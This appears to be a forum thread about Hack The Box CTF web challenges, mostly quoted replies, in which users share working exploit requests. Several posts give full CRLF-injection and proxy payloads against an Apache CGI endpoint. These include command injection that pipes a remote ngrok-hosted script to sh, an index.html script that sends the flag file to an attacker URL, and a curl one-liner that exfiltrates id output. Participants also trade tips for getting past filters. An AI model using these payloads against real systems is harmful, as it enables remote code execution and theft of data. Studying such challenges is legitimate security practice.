[mallu93]

Correct / is a forbidden character, it will fail everytime if you use it. You can set up ngrok and do curl%2b--location%2bx.x.x.x.ngrok-free.app|sh with your payload in index.html if you don't have a VPS

Tangent, anyone get Eldoria Panel? I have the solve locally but the bot times out too quickly everytime

i have this payload in my index.html
#!/bin/bash

# Send the flag to your netcat listener

cat /flag* | base64 | curl -X POST --data-binary @- https://25a9-1xxxxx.ngrok-free.app/capture
and i send this request
/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2520--location%25205632-11xxxxx.ngrok-free.app|sh)%26name=%0d%0a%0d%0a
i got response
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl --location 5632-110xxxxxxxxx.ngrok-free.app|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

but i don't get flag ,

any suggestion please

[asciichar]

Correct / is a forbidden character, it will fail everytime if you use it. You can set up ngrok and do curl%2b--location%2bx.x.x.x.ngrok-free.app|sh with your payload in index.html if you don't have a VPS

Tangent, anyone get Eldoria Panel? I have the solve locally but the bot times out too quickly everytime

Did you solve it? I spent hours and nothing works :/

[mallu93]

Correct / is a forbidden character, it will fail everytime if you use it. You can set up ngrok and do curl%2b--location%2bx.x.x.x.ngrok-free.app|sh with your payload in index.html if you don't have a VPS

Tangent, anyone get Eldoria Panel? I have the solve locally but the bot times out too quickly everytime

Did you solve it? I spent hours and nothing works :/

ok thanks i get it now

[oyfyic]

Correct / is a forbidden character, it will fail everytime if you use it. You can set up ngrok and do curl%2b--location%2bx.x.x.x.ngrok-free.app|sh with your payload in index.html if you don't have a VPS

Tangent, anyone get Eldoria Panel? I have the solve locally but the bot times out too quickly everytime

Did you solve it? I spent hours and nothing works :/

ok thanks i get it now

Could you kindly share the payload you used as well as the contents of your index.html. Already set up the ngrok

[Mastermind001]

thanks bro for helping

---

thanks bro for helping

[skalvin]

Did you solve it? I spent hours and nothing works :/

u can use public ftp.dlptest.com to solve this chall

[ricowalsky]

I'm stuck in Stealth Invasion  /question 5/  can anyone help me please?

[Jonwi]

I'm also getting an error with the webhook. My theory is that the application filters out domain names that don't contain anything. It accepts webhook.site, but not webhook.site/<id webhook>, nor does it accept names that begin with https. I don't know if there's a way to bypass this.

Yeah. Cant seem to get past the filters. Someone who has solved this challenge kindly tell us what you did because it just ain't working out for us

Did you figure it out

[S3d4tion]

Remember that you need public IP to capture traffic from HTB docker, or use something like request catcher.

curl 'http://localhost:1337/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2b172.17.0.1?a=$(id))%26name=%0d%0a%0d%0a'

[oyfyic]

Remember that you need  public IP to capture traffic from HTB docker, or use something like request catcher.

curl 'http://localhost:1337/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2b172.17.0.1?a=$(id))%26name=%0d%0a%0d%0a'

Thanks. This helped me to solve it. Much appreciated!!